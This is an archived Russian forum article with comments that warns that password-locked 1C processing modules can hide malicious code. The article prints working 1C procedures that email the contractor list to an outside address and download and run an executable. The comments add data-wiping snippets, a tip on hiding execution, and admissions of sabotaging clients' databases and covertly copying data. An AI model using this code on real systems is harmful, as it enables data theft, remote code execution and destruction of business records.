Что может скрываться в модуле обработки?

25.05.09

Администрирование - Информационная безопасность

Многие из программистов 1С Предприятие при выкладывании своих обработок (например на Инфостарт) закрывают доступ к модулю объектов паролем. Что же они там могут прятать, приведу пару примеров ( http://infostart.ru/projects/3837/ ):

Что может скрываться в модуле обработки?

Пример первый, «тырим» справочник Контрагенты :)

Процедура ТыримКонтрагентов()
АдресКуда = "sergey1c@ngs.ru";
ТД = Новый ТекстовыйДокумент;

Запрос = Новый Запрос;
Запрос.Текст =
"ВЫБРАТЬ РАЗРЕШЕННЫЕ РАЗЛИЧНЫЕ
| Контрагенты.Ссылка
|ИЗ
| Справочник.Контрагенты КАК Контрагенты
|ГДЕ
| Контрагенты.ЭтоГруппа = ЛОЖЬ";

Выборка= Запрос.Выполнить().Выбрать();

Пока Выборка.Следующий() Цикл
    ТД.ДобавитьСтроку(Выборка.Ссылка.НаименованиеПолное);
КонецЦикла;

Путь = "c:\kont.txt";

ТД.Записать(Путь);


Профиль = Новый ИнтернетПочтовыйПрофиль;
Профиль.АдресСервераSMTP = "smtp.mail.ru";
Профиль.ПортSMTP = 25;
Профиль.ПользовательSMTP = "kontrag";
Профиль.ПарольSMTP = "kontrag";
Профиль.АутентификацияSMTP = СпособSMTPАутентификации.Login;

ИнтернетПочта = Новый ИнтернетПочта;

Попытка
    ИнтернетПочта.Подключиться(Профиль);
Исключение
КонецПопытки;


ПочтовоеСообщение = Новый ИнтернетПочтовоеСообщение;
ПочтовоеСообщение.Тема ="Контрагенты";
ПочтовоеСообщение.Отправитель ="kontrag@mail.ru";
ПочтовоеСообщение.Вложения.Добавить(Путь, "Конт.txt");
ПочтовоеСообщение.Получатели.Добавить(АдресКуда);

Попытка
    ИнтернетПочта.Послать(ПочтовоеСообщение);
    ИнтернетПочта.Отключиться();
Исключение
КонецПопытки;

УдалитьФайлы(Путь);

КонецПроцедуры

В данном примере выбираются только полные наименования контрагентов.

Потом только остается проверять почту указанную в АдресКуда = "sergey1c@ngs.ru".

Пример второй, заносим на компьютер вирус

Процедура ЗаносимВирус()

 

КудаСохраняем ="c:\FarManager170.exe";

HTTP = Новый HTTPСоединение("www.farmanager.com");

HTTP.Получить("/files/FarManager170.exe", КудаСохраняем);

ЗапуститьПриложение(КудаСохраняем);

 

КонецПроцедуры

Тут вообще все просто, скачивается и запускается

P.S.

Большая просьба для всех, не примеряйте эту статью на себя.

+97 –1

См. также

Интеграция Vault и 1С

Информационная безопасность Пароли Платформа 1С v8.3 Бесплатно (free)

Все еще храните пароли в базе? Тогда мы идем к вам! Безопасное и надежное хранение секретов. JWT авторизация. Удобный интерфейс. Демо конфигурация. Бесплатно.

30.05.2024 8035 kamisov 19

Настройка аутентификации в 1С с использованием стандарта RFC 7519 (JWT)

Информационная безопасность Программист Платформа 1С v8.3 Бесплатно (free)

Рассмотрим в статье более подробную и последовательную настройку аутентификации в 1С с использованием распространенной технологии JWT, которая пришла в программу в платформе версии 8.3.21.1302.

27.02.2024 11067 PROSTO-1C 10

Device flow аутентификация, или туда и обратно

Информационная безопасность Программист Платформа 1С v8.3 Абонемент ($m)

Интеграционные решения стали неотъемлемой частью нашей жизни. Правилом хорошего тона в современных приложениях является не давать интегратору доступ к чувствительным данным. Device flow позволяет аутентифицировать пользователя, не показывая приложению чувствительные данные (например: логин и пароль)<br> Рассмотрим Device flow аутентификацию, в приложении, на примере OpenID провайдера Yandex.

1 стартмани

27.10.2023 2929 platonov.e 1

Установка 1С:Сервера взаимодействия. Заметки на полях

Информационная безопасность Системный администратор Программист Платформа 1С v8.3 1C:Бухгалтерия Бесплатно (free)

Нюансы установки 1С:Сервера взаимодействия в рабочем контуре

11.10.2023 5798 capitan 9

Быстрая и комплексная оценка защищенности базы и сервера

Информационная безопасность Системный администратор Платформа 1С v8.3 1C:Бухгалтерия Россия Абонемент ($m)

Продукты на основе решений 1С уверенной поступью захватывают рынок учётных систем в стране. Широкое распространение программ всегда порождает большой интерес к ним со стороны злоумышленников, а пользователь 1С это одна из дверей в защищённый информационный контур предприятия. Обработка позволяет быстро и комплексно оценить настройки безопасности конкретной базы и возможности пользователя этой базы на сервере. Также можно оценить некоторые аспекты сетевой безопасности предприятия со стороны сервера 1С.

5 стартмани

24.04.2023 6721 22 soulner 8

Двухфакторная аутентификация в 1С через Telegram и Email

Информационная безопасность Системный администратор Программист Платформа 1С v8.3 1С:ERP Управление предприятием 2 Абонемент ($m)

1С, начиная с версии платформы 8.3.21, добавили в систему возможность двойной аутентификации. Как это работает: в пользователе информационной базы появилось свойство «Аутентификация токеном доступа» (АутентификацияТокеномДоступа во встроенном языке), если установить этот признак и осуществить ряд манипуляций на встроенном языке, то появляется возможность при аутентификации отправлять HTTP запросы, которые и реализуют этот самый второй фактор. Данное расширение позволяет организовать двухфакторную аутентификацию с помощью электронной почты или мессенджера Telegram.

2 стартмани

08.12.2022 8023 57 Silenser 12

Временная блокировка работы пользователя (Alt+L)

Информационная безопасность Пароли Платформа 1С v8.3 Управляемые формы 1C:Бухгалтерия Бесплатно (free)

Расширение для параноиков.

22.11.2022 4816 132 ixijixi 12

История одного взлома или проверьте вашу систему на безопасность

Информационная безопасность Платформа 1С v8.3 1C:Бухгалтерия Бесплатно (free)

От клиента клиенту, от одной системы к другой, мы вновь и вновь встречаем одни и те же проблемы и дыры в безопасности. На конференции Infostart Event 2021 Post-Apocalypse Виталий Онянов рассказал о базовых принципах безопасности информационных систем и представил чек-лист, с помощью которого вы сможете проверить свою систему на уязвимость.

26.10.2022 11671 Tavalik 46

118

Комментарии

Подписаться на ответы Инфостарт бот

Свернуть все

1. bestuzhev 684 10.04.09 16:35 Сейчас в теме

Как синтаксис подсветить?

2. Поручик 4672 10.04.09 16:55 Сейчас в теме

Самим за код стрёмно, вот и прячут его за паролем.

Ответить

3. bestuzhev 684 10.04.09 17:03 Сейчас в теме

(2) А что срамиться, написал криво умные люди подскажут, в следующий раз лучше напишешь, а то так и будешь всю жизнь как попало писать :)

4. KapasMordorov 429 10.04.09 17:38 Сейчас в теме

В 1С очень уж много возможностей в платформе. Для учетной программы - т.е. в каком качестве ее в основном покупают.

5. krein 64 10.04.09 18:26 Сейчас в теме

Щас те, кто раньше об этом и не знал, начнут вставлять этот код в обработки :),
а вообще если установлен нормальный фаервол, то он предупредит о том, что 1с стучится в инет, а антивир заблокирует вирусню.

6. bestuzhev 684 10.04.09 18:38 Сейчас в теме

(5) Но у мнегих даже антивируса нет, вот в чем проблема.

7. bestuzhev 684 10.04.09 18:39 Сейчас в теме

хм, обработку с примерами видимо удалили админы... ну да ладно...

8. wirg 10.04.09 19:11 Сейчас в теме

Вот люди зачем подсказывать идеи вредителям и так мало стоящих разработок.

9. German 414 10.04.09 21:47 Сейчас в теме

Да. Один напишет ... другие с гордостью применят -

13. bestuzhev 684 10.04.09 22:14 Сейчас в теме

(9) А ты как хотел, либо работай с проверенными людьми либо код смотри. Если код не понимаешь, лучше вообще не пользоваться чужими разработками, в конце концов 1с не игрушка и потерять (испортить) из нее данные в связи с чьей-то некомпетентностью не есть good. И вообще, имхо, каждый уважающий себя программист следит за своей репутацией и она многого стоит, так как кормит его. А если ты скачал где-то непонятную обработку, и воспользовался ей, это на твой страх и риск.

46. Mickl 118 11.04.09 19:47 Сейчас в теме

(9) Кто предупрежден тот вооружен!

10. Душелов 4021 10.04.09 21:50 Сейчас в теме

А представляете, что можно во внешние компоненты запихать!!

Ответить

15. Abadonna 3971 10.04.09 22:23 Сейчас в теме

(10) А в экзюк еще проще ;)

16. Душелов 4021 10.04.09 22:27 Сейчас в теме

(15) А в активикс еще проще! Только ее на форму бросил - сразу админские пароли ушли. 1С-ку запустил - информация о контрагентах и прочим ушла.
Ну и всякие бэкдоры активировались.

17. Abadonna 3971 10.04.09 22:30 Сейчас в теме

(16) Я уж, честно говоря, и не знаю куда мне все эти пароли с контрагентами девать! Развелось видимо-невидимо, вот и шлю щас кому попало ;)

18. Душелов 4021 10.04.09 22:33 Сейчас в теме

(17) А я на диски записываю. На горбушке и савеле мои сборники продаются.

11. biv75 10.04.09 22:04 Сейчас в теме

Так Василий, ты меня пугаешь, у меня твоих компонент в разработках, что грязи

12. Душелов 4021 10.04.09 22:05 Сейчас в теме

(11) Поздно, я уже все знаю!

14. biv75 10.04.09 22:19 Сейчас в теме

(12) Коварный ты тип, суров ты на расправу )))

19. bestuzhev 684 10.04.09 22:57 Сейчас в теме

Вот, что выясняется, все тут с грешком. :)

20. Душелов 4021 10.04.09 22:59 Сейчас в теме

Почему с грешком? Это просто очередной способ заработка.
Владельца порталов базы пользователей продают для спамеров - тоже хорошо.

21. Душелов 4021 10.04.09 23:00 Сейчас в теме

(0) А во втором примере вместо "ЗапуститьПриложение(КудаСохраняем);"
Я бы посоветовал использовать Script.Shell для того, чтобы не выскакивало левых окон.

22. bestuzhev 684 10.04.09 23:06 Сейчас в теме

(21) Да бога ради это только пример :)
У меня например вообще не один вариант не проканает т.к. когда я эту статью выложил интернет себе отключил от греха по дальше. :)

23. script 128 10.04.09 23:41 Сейчас в теме

Вы оч. странные, а анти вирусы начто нужны.
С нормальным аетивирусом никакая внеш. компонента и скрытый код не помогут.
Тема открыта на показуху для зивак.

24. Душелов 4021 10.04.09 23:45 Сейчас в теме

(23) И как же антивирус поможет против от скачивания файла и его запуска?

25. anbxp 11.04.09 00:20 Сейчас в теме

(24) Нормальный антивирус тупо заблокирует всю деятельность ВК/обработки. Когда-то давно тестировал фаерволл ZoneAlarm (не антивирус, правда), так он ни одному тестеру даже запуститься не дал. Сейчас стоит NortonAntivirus2008 + Comodo. Они на пару 1С даже за обновлениями еле пропускают:)

26. Душелов 4021 11.04.09 00:50 Сейчас в теме

:))) Антивирусы ничего этого не блокируют.
Если 1С-ке разрешено лазить по 80 порту, то она спокойно скачает и запустит все.

27. anbxp 11.04.09 01:02 Сейчас в теме

Если разрешено, то она попытается скачать. А вот запустить - не получится. Блин, да так про любое приложение можно говорить. Типа, раз ie разрешено выходить в инет, то он все и запустить сможет. Разработчики антивирусов полные идиоты?

28. Душелов 4021 11.04.09 01:03 Сейчас в теме

При чем тут антивирус и запуск приложения?

34. artbear 1568 11.04.09 06:27 Сейчас в теме

(28) 1. Ты не прав, антивирь не даст запуститься приложению, которое содержит вирус, и неважно, откуда и как его запускаем.
2. Вот закачка файлов и доступ к почте, сайтам и т.д уже другое дело.
Большинство антивирусов не слишком блокируют эти возможности, потому что это не их основная задача, а задача файерволлов и т.д.

ИМХО по опыту на большинстве машин стоят обычные антивири с минимальной блокировкой интернет-трафика. Поэтому вариант 1 и ему подобные с отправкой важной инфы по почте может пройти наверняка.

А вариант 2 практически не жизнеспособен :)

36. bestuzhev 684 11.04.09 06:48 Сейчас в теме

(34) Вирус это как вариант, можно и другой вредоносный код, который антивирус не распознает.

>ИМХО по опыту на большинстве машин стоят обычные антивири с минимальной >блокировкой интернет-трафика
Вот это я и пытаюсь до все донести.+

37. Abadonna 3971 11.04.09 07:29 Сейчас в теме

(34) Фильм "Антикиллер"
- Он же не чувствует боли.
- У меня почувствует!
В НАШЕЙ сетке никогда ничего не запустится, не полезет по портам и т.д.
Политика фашизма применима полностью :))))

29. Душелов 4021 11.04.09 01:04 Сейчас в теме

OLE-соединения тоже блокируются "антивирусом"?

30. Душелов 4021 11.04.09 01:05 Сейчас в теме

Вообщем разговор слепого с глухим :)

31. anbxp 11.04.09 01:09 Сейчас в теме

(30) Так ответить проще всего. Все соединения проверяются антивирусом. И все запуски приложений тем более. Если он нормальный. Хотя, действительно, разговор пустой.

32. Душелов 4021 11.04.09 01:14 Сейчас в теме

Да, я сдался. Мне уже возразить нечего.
Нормальный антивирус заблокирует 1С-ку.

33. anbxp 11.04.09 01:19 Сейчас в теме

Советую на чистую ОС установить каспера последнего, и посмотреть - как это происходит:) Все, спокойной ночи, до завтра:)

35. bestuzhev 684 11.04.09 06:46 Сейчас в теме

Что ты прикопались к этим вирусам, я думаю что дороже потерять справочник контрагенты с контактами чем комп вирусом заразить. Тем более, как я уже говорил выше, не у всех стоят антивирусы и фаерволы, по себе людей не судят. Я видел очень много компов без антивирусов и фаерволов но с 1С. Многим жалко 1000 рублей на антивирус, а ломаный поставить ума не хватает.

38. dushich 34 11.04.09 10:58 Сейчас в теме

Ну, ребят. С таким же успехом можно и блокнот обвинить в опасности. Я вот скрипты в блокнотике редактирую :)
Бред. Люди закрывают модули ради выгоды. Или как сказал bestuzhev чтоб не срамится.
А использовать для таких целей каверзных 1С, конечно можно, но почти не имеет смысла.
1. Если кто-то узнает, то это полный провал в карьере.
2. А если используешь чужое, то скорее всего из интернета. А кому может понадобится список контрагентов, к примеру моего маленького городка?
Бред.

39. luns 11.04.09 11:43 Сейчас в теме

Дарю от себя кусочек зловредного кода:

Код
Для Каждого Регистр Из Метаданные.РегистрыСведений Цикл Набор = РегистрыСведений[Регистр.Имя].СоздатьНаборЗаписей(); Набор.Записать(); КонецЦикла; Показать полностью

Код

Для Каждого Регистр Из Метаданные.РегистрыСведений Цикл
      Набор = РегистрыСведений[Регистр.Имя].СоздатьНаборЗаписей();
      Набор.Записать();
   КонецЦикла;

Показать полностью

69. mc_syma_v@mail.ru 07.05.09 22:04 Сейчас в теме

(39) просто жесть

40. luns 11.04.09 11:44 Сейчас в теме

Антивирусы и фаерволы не спасут... тока бэкап.

41. Evg-Lylyk 4969 11.04.09 15:05 Сейчас в теме

Зря вы тык эту фигню пишите найдутся горе умельцы от которых хто нить да пострадает.
Завтра 1С выпустят защиту от вредоностного кода :)))))
Прикольно наверно сидишь тут бамс выскакивает сообщение пользователь "Х" выполняет подозрительное действие через обработку "Ei.epf" блокировать?

42. bestuzhev 684 11.04.09 17:56 Сейчас в теме

(41) Вообще-то надо просто запретить выполнять обработки кому попало, а нужные подключить как внешние или на кройняк в конфу встроить.

48. Evg-Lylyk 4969 12.04.09 12:28 Сейчас в теме

(42) да все можно, но это всегда работа и неудобства себе и другим.
(47) это пиар. Вспомнил самую "системную" обработку оказался EI. :)

47. German 414 11.04.09 20:09 Сейчас в теме

(41) нормально!!!. вот и Ei не за что досталось :(

53. maljaev 789 16.04.09 00:26 Сейчас в теме

(41) Документ "Расходная накладная" пытается создать записи по регистру "Партии товаров". Запретить? Разрешить? Игнорировать?
:)

43. CheBurator 3139 11.04.09 18:34 Сейчас в теме

Ребята, о чем вы говорите... народ не читает ридми даже... хотя в первых строках описания на странице разработки жирным шрифтом написано: СПЕЦИАЛЬНО ДЛЯ НЕКОТОРЫХ "ЛЕНТЯЕВ", КОТОРЫХ ЛОМАЕТ ЧИТАТЬ README.TXT - ПИШУ КРУПНЫМИ ЖИРНЫМИ БУКВАМИ В НАЧАЛЕ ОПИСАНИЯ: ЧИТАЙТЕ README.TXT C ПЕРВОЙ СТРОКИ до ПОСЛЕДНЕЙ - ТАМ ВСЕ НАПИСАНО...

44. bestuzhev 684 11.04.09 18:46 Сейчас в теме

(43) Дело говоришь. Вообще все люди лентяи, все хотят упростить свою жизнь. Как говориться Лень - двигатель прогресса.

45. Mickl 118 11.04.09 19:45 Сейчас в теме

Да, Сергей. А я даже как то и не думал об этом
Спасибо "+"

49. drkhaired 51 14.04.09 12:56 Сейчас в теме

Я примерно предполагал, что такое возможно.. Это еще фигня, вот если наименование номенклатуры похерить, итд.... Поэтому использование чужих запароленых разработок могут привести в такого рода неприятностям, понятно, что все это поправимо, но зачем лишняя головная боль.

50. rebuzx 165 15.04.09 07:41 Сейчас в теме

Спокойствие спасёт не антивирус и файрвол!
Бэкап - ваше спасение! У меня бекапиться 2 раза в сутки, скриптами через планироващик заданий, автопилотом всех нагло выкидывает и архивирует базы. Все знают что во столько то будет архивация. Базы на Скуле. Так что проблемы все решаются в течении 5 минут (тьфу тьфу пока проносило мимо).
А антивири нужны для большего спокойствия от внеших атак зловредных программ. У меня 1С стоит в фильтрах антивируса и он её даже не сканирует как и 1С базы на SQL.

51. maljaev 789 15.04.09 13:41 Сейчас в теме

1) БЭКАП МОЖЕТ НЕ СПАСТИ! Если очень осторожно и потихоньку портить данные в базе (седня там одну циферку подправил, завтра там контрагента поменял, послезавтра задолженность с одного сотрудника на другого перевел и т.д.), то когда обнаружатся все эти факты и до бухгалтеров наконец дойдет что всё это неспроста, и обнаружат откуда ноги дойдут - то пройдет столько времени, что восстанавливать базу из бэкапа уже смысла не будет. Только вручную сравнивать все бэкапы с текущей базой и смотреть что, где, как, кем и когда поменялось - а это процесс сцуко очень долгий и геморный.

2) Кроме явных вредных инструкций в коде 1С можно засунуть хоть десяток вирусняков в сам ERT-файл и даже в MD-файл (я, к примеру, теперь умею всё это засовывать в картинку в диалоге формы с минусовыми координатами, так что ее не видно). В данном случае эффект может быть фатальным для базы, компа, сетки. Ну и вы сами знаете, что есть вирусы, которые не находит ни один антивирус; есть вирусы которые блокируют антивирусы, файрваллы и прочие.

3) Своровать данные можно и в обход файрвалла, даже если самой 1С доступ в инет запрещен. Достаточно просто перехватить создание/отправку любого письма, внедрив в него интересующие данные и подменив (добавив) адрес получателя.

59. anbxp 16.04.09 14:32 Сейчас в теме

(51) Заверните мне таких вирусов штук 10, пожалуйста:) И дайте пример кода подмены тела письма из 1С. Только, сначала сами этот код при работающем фаерволе проверьте:)

60. maljaev 789 16.04.09 15:48 Сейчас в теме

(59) artbear правильно сказал - то что я знаю и умею это делать, еще не значит что я буду это делать. Для меня авторитет и здоровье дороже. При скачивании чужой разработки я тоже в первую очередь смотрю кто автор - некоторым я доверяю больше чем себе. :)

61. anbxp 16.04.09 16:12 Сейчас в теме

(60) Зачемятельная отговорка:)

52. MrDen 435 15.04.09 20:42 Сейчас в теме

ХМ, да в принципе то можно многое сделать :-) тут уж зависит от того сам ты это делать будеш или защищаться от кого :-)
Если сам, то мне кажется неэтично, в УК разъянено на сколько, ну а степень защищенности прямо пропорциональна уровню знаний и умению быть "неэтичным".
Тут как в жизни 2 пути либо предохраняешся либо нет :-)

54. maljaev 789 16.04.09 00:41 Сейчас в теме

Кроме того, опасность может представлять почти каждый элемент диалога. К примеру, если формулу кнопки "Сформировать" (имеющей изначально формулу "Сформировать();") изменить на нижеприведенный код, то последствия будут фатальными:

Спр=СоздатьОбъект("Справочник.Контрагенты"); Спр.ПорядокКодов(); Спр.ВыбратьЭлементы(); Пока Спр.ПолучитьЭлемент()=1 Цикл Спр.Наименование=""; Спр.Записать(); КонецЦикла;

Тут единственное требование, чтобы в модуле была определена переменная "Спр". И анализ кода абсолютно не даст вам представления о том, что на самом деле делает обработка. Необходим также анализ всех элементов диалога. В общем, застраховаться ото всех возможных ситуаций практически невозможно. Единственно возможная защита - брать обновления и обработки только из надежных проверенных источников, например с дисков ИТС. :)

55. larisab 160 16.04.09 08:38 Сейчас в теме

После скачивания какой нибудь обработки, я смотрю код (привычка), если закрыт, сразу удаляю - ну не надо мне такого. Потому что 90% обработок не подходят для казахстанских конфигураций. Спасибо за предупреждение, буду бдительнее. Но вот вопрос, как теперь это скажется на продаже через ИС программ и обработок, они то в основном все закрытые так или иначе, доверие пользователей то упадет?

56. PVG_73 17 16.04.09 12:35 Сейчас в теме

А зачем что-то скачивать....
все приносится с собой в макете....
не просто а очень просто.... :(

Когда я с этим столкнулси... то был неприятно удивлен...

Зато теперь предупрежден, значит вооружен.... :)

57. artbear 1568 16.04.09 14:05 Сейчас в теме

Лично я при использовании закрытого кода смотрю еще на личность разработчика. Если он лично мне известен или известны его работы, и я вижу их профессиональность, я с намного большим доверием отношусь к его выложенной, но закрытой работе.

ЗЫ ну и расшифровку зашифрованных модулей 8 еще никто не отменял на самый крайний случай - честно говоря, мне еще ни разу не пригодилось.

58. artbear 1568 16.04.09 14:07 Сейчас в теме

(57) По себе знаю - профессионал не станет всякой фигней типов вирусов, удаления данных и т.д. заниматься :)
А тем более выкладывать в общий доступ подобные вещи - авторитет можно потерять навсегда.

62. Fuego 463 17.04.09 23:26 Сейчас в теме

Мне чаще встречались писаки, которые амбициозно прятали свой код за паролем. Мол, обязательно же сопрут мой драгоценный код!.. А в разрезе - код этот полнейшая дрянь. А насчёт всяких фишек с воровством информации чрез нет - просто нужно запретить 1С-ке доступ в инет. Например устроить запуск программы от ограниченной политиками учётной записи. Я сам над этим не заморачивался. Чужие компоненты и активексы не использую, обработкам всегда сперва смотрю в кишки, а потом на морду. Да и на морду эту вообще-то редко смотрю :)

74. h00k 51 28.06.09 00:53 Сейчас в теме

(62) Не обязательно закрывать паролем, я например, регулярно использую "функционал поставки без исходных кодов". И связано это обычно не с "ценностью" кода, а установленными в обработках ограничениями, что-то вроде демо версии. При определенной договоренности с клиентом, это так же может быть защита кода от всяких "умельцев", коих в области 1С великое множество, а клиент оплативший обработку опасается "утечки" модуля к конкурентам (пример из жизни: привязка обработки загрузки деталей в 1С из ETKA 7 к конфигурации заказчика). Профессионала это не остановит, благодаря самой концепции 1С как "открытой" платформы - даже защита на донглах не состоятельна (имеется в виду сама возможность снятия защиты, а не коммерческая обоснованность подобных действий), зато очередное "юнное дарование" скорее всего потерпит фиаско...

63. TIG-PROGRAMMIST 49 19.04.09 03:08 Сейчас в теме

Ломать не строить душа не болит, а стеклянный х-й дуракам не на долго, пусть пишут пока пишется, но если вычислим куда уходит информация вот туда мы и наспамим этому горе шпиону... пущай пару миллионов писем с фуфлом разгребает.....

64. TIG-PROGRAMMIST 49 19.04.09 03:12 Сейчас в теме

Короче надо сделать раздел нечистых обработок и их авторов и со времен этого хлама наберется как записей в базах антивирусных программ, а чуть позже 1С овцы напишут антивирус под 1С и будет нам счастье а им дополнительная прибыль...

65. TIG-PROGRAMMIST 49 19.04.09 03:15 Сейчас в теме

И вообще сцуко стрелять надо таких лжепрограммистов, не на вижу разрушителей, нет бы написать путнее, а нет нате вам говно в салате... УРОДЫ КТО ПИШЕТ ПОДЛЫЙ КОД!!!! УЗНАЮ БУДУ СТРОГО СТРЕЛЯТЬ В ВИСОЧНУЮ ОБЛАСТЬ.

66. Abadonna 3971 19.04.09 04:16 Сейчас в теме

(65)> УЗНАЮ БУДУ СТРОГО СТРЕЛЯТЬ В ВИСОЧНУЮ ОБЛАСТЬ.
Эк разошелся :))) А есть из чего стрелять? ;)

75. h00k 51 28.06.09 02:56 Сейчас в теме

(65) Ну-ну, стрелятель... я лично знаю несколько организаций где в результате выполнения моих обработок была "надежно убита" измененная конфигурация, правда я не портил данные, всегда оставлял им возможность вернуться к типовому функционалу. И связано сие не с детской тягой к разрушению, а с "не чистоплотностью" некоторых заказчиков, "забывавших" что кроме предоплаты еще есть окончательный рассчет, либо считавших, что "любой 1С-ник" и тарелке супа должен быть рад -"вас же как грязи, мне любой такое за 3 рубля напишет...".
Потом выясняется что не любой, но с заказчиком, у которого ТАКОЕ ко мне и моим коллегам отношение, я работать уже не буду.

77. TIG-PROGRAMMIST 49 08.08.09 02:42 Сейчас в теме

(65) А вот не чистоплотным мыло в обработку и я подсовываю, опа не оплатили и можно начинать мылить попы, а как же здесь вам ни тут и за тарелку супа писать не будем, т.к. если бы все было так просто "русский бейсик" по мимо всего мозг должен иметь хотя бы 50% знаний бухгалтерского учета для корректной доработки того или оного объекта, а то было один чуюдик стырил мои нароботки для одной фирмы и за бабулесы внедрил их в другую конфигурацию и управился, а оно опачки опатуленьки и не работает хорошо что не ушатал базу и то ладно так что желающих поиметь программеров 1С просьба не обольщаться, программеров то дофига а ИСТЕЕНО ШАРЮЩИК ЕДИНИЦЫ.
З.Ы.
h00k - так что правильно ты их надо знать себе цены если ты спец. А просто хацкерам которые пишут вреднасти все равно стрелять буду.

67. vde69 925 21.04.09 15:51 Сейчас в теме

Вообще было-бы полезно запостить фамилии и паспортные данные авторов сиих опусов.

зы
к слову сказать я, тоже делал довольно сомнительную шнягу, авторун на флеху которая эмитировала окно выбора баз 1с, при выборе базы - сливала все на флеху и паралельно запускала 1с (ни окон, ни процесов ее небыло видно), делал для ревизии биг босом своих филиалов на предмет "левых баз".

73. kiruha 388 09.06.09 17:13 Сейчас в теме

(67) А чего искать далеко...
Встречал 2 раза. Одна обработка была с CDO.

68. sound 538 22.04.09 00:19 Сейчас в теме

Ну зачем же так с фаром а?, прямо в вирусы его? Однако рушатся основы мироздания! Ничего против total не имею. О, вечные споры! Ой что это я? :)

70. O-Planet 6403 07.05.09 23:21 Сейчас в теме

(68) Far и есть вирус

71. artbear 1568 08.05.09 07:18 Сейчас в теме

(70) Олег, не пойму, есть у тебя смайлик во фразе или нету :)

72. sound 538 09.05.09 19:51 Сейчас в теме

мдее...

76. h00k 51 28.06.09 03:04 Сейчас в теме

Хотя на столько явные "закладки" я никогда не оставлял. Обычно, для 7.7, это была какая нибудь часто используемая кнопка, а восьмерка - просто рай для экспериментаторов :)

78. TIG-PROGRAMMIST 49 08.08.09 02:44 Сейчас в теме

77 адресавал 75-76, ошибся простите засранца..

79. Lizi60 25.01.12 14:56 Сейчас в теме

Спасибо огромное за предупреждение! Только что скачала внешнюю печатную форму М-11 к операции, введённой вручную. Потратила единичку на это безнадёжное мероприятие.... А там пароль на модуль объекта...

80. ixijixi 1997 09.08.12 16:06 Сейчас в теме

Бугага! Я даже на думал о таком, спасибо за предупреждение!

81. iov 407 25.10.12 16:27 Сейчас в теме

(80) Щас конечно сделаю неприятно но статья - 25.05.2009 14:15 за это время можно стырить вернуть- потом еще раз стырить много-много раз... И как любой уважающий себя программист - вы должны иметь не клиническую паранойю и таблетки от неё :) ... А вообще любая закрытая обработка даже за деньги - есть черный ящик и НИКТО не гарантирует что там такого нет.

83. AlexanderKai 23.04.15 09:49 Сейчас в теме

(81) iov,
Да вообще никто и ничего не гарантирует. Есть Windows - закрытый код, никто не гарантирует, что нет бэкдоров. Есть Linux - никто не гарантирует, что нет уязвимостей(тех же бэкдоров).

82. ivanov_alex 67 26.10.12 09:31 Сейчас в теме

да уж...
для этих целей использую снималку паролей, благо они есть везде в свободном доступе
а разработки закриптованные и использующие ВК, тем более самописные стараюсь не пользовать

Оставьте свое сообщение

E-mail:

Автор:

Сергей Бестужев (bestuzhev)

Рейтинг: 684

Для получения уведомлений о новых публикациях автора подключите телеграм бот: Инфостарт бот

Публикация:

№ 19610

Создание 10.04.09 16:31

Обновление 25.05.09 14:15

Статистика:

Просмотры 17615

Загрузки 0

Рейтинг 96

Комментарии 84

Характеристики:

Код открыт Не указано

Рубрики Информационная безопасность

Кому Программист

Тип файла Нет файла

Платформа Платформа 1С v8.3

Конфигурация 1C:Бухгалтерия

Операционная система Не имеет значения

Страна Россия

Отрасль Не имеет значения

Налоги Не имеет значения

Вид учета Не имеет значения

Доступ к файлу Бесплатно (free)